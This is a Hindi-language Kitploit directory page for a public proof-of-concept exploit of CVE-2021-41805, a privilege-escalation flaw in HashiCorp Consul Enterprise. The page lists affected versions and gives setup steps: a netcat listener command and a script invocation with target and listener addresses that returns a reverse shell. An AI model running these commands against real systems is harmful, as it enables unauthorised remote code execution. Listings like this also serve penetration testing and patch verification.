Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-41805 — CVE-2021-41805 के लिए एक प्रमाण-अवधारणा जो HashiCorp Consul Enterprise में एक भेद्यता है, जो उन्नत विशेषाधिकारों के साथ रिमोट कोड निष्पादन (RCE) की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/acfirthh/cve-2021-41805
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षालर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubacfirthh/cve-2021-41805

CVE-2021-41805

CVE-2021-41805 के लिए एक प्रमाण-अवधारणा जो HashiCorp Consul Enterprise में एक भेद्यता है, जो उन्नत विशेषाधिकारों के साथ रिमोट कोड निष्पादन (RCE) की अनुमति देती है।

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-41805 - HashiCorp Consul Enterprise RCE

[!चेतावनी] कानूनी अस्वीकरण: यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है! पूर्व सहमति के बिना लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है। इस उपकरण का उपयोग करते समय सभी लागू कानूनों का पालन करना उपयोगकर्ता की जिम्मेदारी है। इस उपकरण का डेवलपर कोई देयता नहीं लेता है और इस कार्यक्रम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

CVE के बारे में

एक ACL टोकन (डिफ़ॉल्ट operator:write अनुमतियों के साथ) का उपयोग एक नेमस्पेस में किया जा सकता है ताकि किसी भिन्न नेमस्पेस में अनजाने विशेषाधिकार वृद्धि हो सके। इसका दुरुपयोग बढ़े हुए विशेषाधिकारों के साथ Remote Code Execution (RCE) प्राप्त करने के लिए किया जा सकता है।

प्रभावित संस्करण

  • < 1.8.17
  • 1.9.x < 1.9.11
  • 1.10.x < 1.10.4

स्क्रिप्ट स्थापित करना और चलाना

  • सबसे पहले, रिपॉजिटरी को क्लोन करें:
    git clone https://github.com/acfirthh/CVE-2021-41805.git
  • क्लोन की गई निर्देशिका में जाएं:
    cd CVE-2021-41805
  • एक सरल लिसनर प्रारंभ करें:
    nc -nvlp <LISTENER_PORT>
  • स्क्रिप्ट चलाएं:
    python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [वैकल्पिक: -t <ACL टोकन> -v (वर्बोज़) -s (SSL का उपयोग करें)]

रिवर्स शेल

अपेक्षित आउटपुट

बुनियादी तर्कों के साथ एक्सप्लॉइट चलाने पर: -r [TARGET_IP], -rp [TARGET_PORT], -l [LISTENER_IP], -lp [LISTENER_PORT] (-t [ACL_TOKEN], -s [SSL का उपयोग करें]) मूल आउटपुट इस प्रकार होगा:

root@kitploit:~
[*] PUT अनुरोध सफलतापूर्वक किया गया। अपने लिसनर की जाँच करें...

बुनियादी तर्कों के साथ -v [VERBOSE] जोड़कर एक्सप्लॉइट चलाने पर वर्बोज़ आउटपुट मिलेगा:
वर्बोज़ आउटपुट

यदि एक्सप्लॉइट चलाने पर कोई त्रुटि होती है और -v तर्क निर्दिष्ट किया गया है, तो आउटपुट कुछ इस प्रकार होगा:
त्रुटि के साथ वर्बोज़ आउटपुट

टूल डाउनलोड करें